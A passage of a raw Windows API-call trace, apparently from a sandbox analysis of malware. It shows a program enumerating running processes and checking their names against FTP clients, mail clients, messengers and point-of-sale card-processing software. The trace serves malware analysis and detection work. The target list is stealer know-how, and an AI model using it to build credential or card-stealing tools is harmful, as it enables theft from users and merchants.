lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.413] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x13e0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="brokers_shed_leslie.exe") returned 0x17 [0109.414] CloseHandle (hObject=0x3e4) returned 1 [0109.414] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x3e4 [0109.414] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.415] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1040000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="miss_portable.exe") returned 0x11 [0109.415] CloseHandle (hObject=0x3e4) returned 1 [0109.416] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x790) returned 0x3e4 [0109.416] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.417] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1340000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="plans.exe") returned 0x9 [0109.417] CloseHandle (hObject=0x3e4) returned 1 [0109.417] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x138) returned 0x3e4 [0109.417] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.418] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xd10000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="substantial.exe") returned 0xf [0109.418] CloseHandle (hObject=0x3e4) returned 1 [0109.419] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x3e4 [0109.419] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.420] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x12e0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="design_yards.exe") returned 0x10 [0109.420] CloseHandle (hObject=0x3e4) returned 1 [0109.420] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x3e4 [0109.420] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.422] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x960000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="trying.exe") returned 0xa [0109.422] CloseHandle (hObject=0x3e4) returned 1 [0109.422] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x648) returned 0x3e4 [0109.422] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.423] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x9e0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="victorian.exe") returned 0xd [0109.424] CloseHandle (hObject=0x3e4) returned 1 [0109.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a8) returned 0x3e4 [0109.424] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.425] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x390000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="workflow-sheets-madison.exe") returned 0x1b [0109.426] CloseHandle (hObject=0x3e4) returned 1 [0109.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x3e4 [0109.426] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.427] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xd70000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="neongarage.exe") returned 0xe [0109.428] CloseHandle (hObject=0x3e4) returned 1 [0109.428] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c0) returned 0x3e4 [0109.428] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.429] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xe0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="smtp old shopping.exe") returned 0x15 [0109.429] CloseHandle (hObject=0x3e4) returned 1 [0109.429] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5ac) returned 0x3e4 [0109.430] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.431] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x190000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="passionjudge.exe") returned 0x10 [0109.431] CloseHandle (hObject=0x3e4) returned 1 [0109.431] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x3e4 [0109.431] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.433] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x2b0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="injuries possible.exe") returned 0x15 [0109.433] CloseHandle (hObject=0x3e4) returned 1 [0109.433] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x3e4 [0109.433] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.435] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x220000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0109.435] CloseHandle (hObject=0x3e4) returned 1 [0109.435] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x3e4 [0109.435] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.436] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1000000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0109.437] CloseHandle (hObject=0x3e4) returned 1 [0109.437] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x3e4 [0109.437] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.438] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xd50000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0109.439] CloseHandle (hObject=0x3e4) returned 1 [0109.439] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x3e4 [0109.439] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.440] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xdb0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0109.440] CloseHandle (hObject=0x3e4) returned 1 [0109.440] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x3e4 [0109.440] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.442] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xe10000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0109.442] CloseHandle (hObject=0x3e4) returned 1 [0109.442] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x3e4 [0109.443] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.444] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xb0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0109.444] CloseHandle (hObject=0x3e4) returned 1 [0109.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x3e4 [0109.444] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.446] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x80000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0109.446] CloseHandle (hObject=0x3e4) returned 1 [0109.446] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x3e4 [0109.446] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.447] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x10f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0109.448] CloseHandle (hObject=0x3e4) returned 1 [0109.448] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3e4 [0109.448] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.449] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x880000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0109.450] CloseHandle (hObject=0x3e4) returned 1 [0109.450] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x3e4 [0109.450] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.451] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x10d0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0109.451] CloseHandle (hObject=0x3e4) returned 1 [0109.451] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x3e4 [0109.451] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.453] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xba0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0109.453] CloseHandle (hObject=0x3e4) returned 1 [0109.453] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc4) returned 0x3e4 [0109.453] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.455] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xd30000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0109.455] CloseHandle (hObject=0x3e4) returned 1 [0109.455] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c8) returned 0x3e4 [0109.455] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.456] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xc80000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0109.457] CloseHandle (hObject=0x3e4) returned 1 [0109.457] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x3e4 [0109.457] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.458] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x11f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0109.459] CloseHandle (hObject=0x3e4) returned 1 [0109.459] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x3e4 [0109.459] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.460] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1260000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0109.461] CloseHandle (hObject=0x3e4) returned 1 [0109.461] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x3e4 [0109.461] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.462] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xaa0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0109.463] CloseHandle (hObject=0x3e4) returned 1 [0109.463] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x3e4 [0109.463] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.464] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xcf0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0109.464] CloseHandle (hObject=0x3e4) returned 1 [0109.464] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x3e4 [0109.464] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.466] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x140000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0109.466] CloseHandle (hObject=0x3e4) returned 1 [0109.466] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x3e4 [0109.466] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.468] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xef0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0109.468] CloseHandle (hObject=0x3e4) returned 1 [0109.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x3e4 [0109.468] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.469] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x10b0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0109.470] CloseHandle (hObject=0x3e4) returned 1 [0109.470] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x3e4 [0109.470] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.471] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xdf0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0109.471] CloseHandle (hObject=0x3e4) returned 1 [0109.471] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x3e4 [0109.472] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.473] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xb10000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0109.473] CloseHandle (hObject=0x3e4) returned 1 [0109.473] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x3e4 [0109.473] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.475] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xa20000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0109.475] CloseHandle (hObject=0x3e4) returned 1 [0109.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x3e4 [0109.475] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.477] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x250000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0109.477] CloseHandle (hObject=0x3e4) returned 1 [0109.477] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x3e4 [0109.477] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.479] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x11e0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0109.479] CloseHandle (hObject=0x3e4) returned 1 [0109.480] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x3e4 [0109.480] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.481] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xbf0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0109.481] CloseHandle (hObject=0x3e4) returned 1 [0109.482] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x3e4 [0109.482] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.483] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xaf0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0109.483] CloseHandle (hObject=0x3e4) returned 1 [0109.483] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x3e4 [0109.483] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.485] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1340000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0109.485] CloseHandle (hObject=0x3e4) returned 1 [0109.485] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x3e4 [0109.485] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.487] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x12c0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0109.487] CloseHandle (hObject=0x3e4) returned 1 [0109.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x3e4 [0109.487] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.488] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0109.489] CloseHandle (hObject=0x3e4) returned 1 [0109.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x3e4 [0109.489] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.490] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x930000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0109.490] CloseHandle (hObject=0x3e4) returned 1 [0109.491] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x3e4 [0109.491] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.492] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x8b0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0109.492] CloseHandle (hObject=0x3e4) returned 1 [0109.492] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x3e4 [0109.492] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.494] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x160000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0109.494] CloseHandle (hObject=0x3e4) returned 1 [0109.494] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x3e4 [0109.494] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.495] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1060000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0109.496] CloseHandle (hObject=0x3e4) returned 1 [0109.496] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x3e4 [0109.496] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.497] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xe80000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0109.497] CloseHandle (hObject=0x3e4) returned 1 [0109.497] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x3e4 [0109.497] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.499] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xce0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0109.500] CloseHandle (hObject=0x3e4) returned 1 [0109.500] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x3e4 [0109.500] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.501] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x260000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0109.501] CloseHandle (hObject=0x3e4) returned 1 [0109.501] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x3e4 [0109.501] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.503] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x350000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0109.503] CloseHandle (hObject=0x3e4) returned 1 [0109.503] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x3e4 [0109.503] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.504] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x190000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0109.505] CloseHandle (hObject=0x3e4) returned 1 [0109.505] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x99c) returned 0x3e4 [0109.505] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.506] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x320000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0109.506] CloseHandle (hObject=0x3e4) returned 1 [0109.507] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x3e4 [0109.507] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.508] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x9f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0109.508] CloseHandle (hObject=0x3e4) returned 1 [0109.508] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x3e4 [0109.508] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.510] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x8f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0109.510] CloseHandle (hObject=0x3e4) returned 1 [0109.510] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3e4 [0109.510] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.511] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x12c0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0109.512] CloseHandle (hObject=0x3e4) returned 1 [0109.512] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x3e4 [0109.512] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.513] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x350000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0109.513] CloseHandle (hObject=0x3e4) returned 1 [0109.514] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ec) returned 0x3e4 [0109.514] EnumProcessModules (in: hProcess=0x3e4, 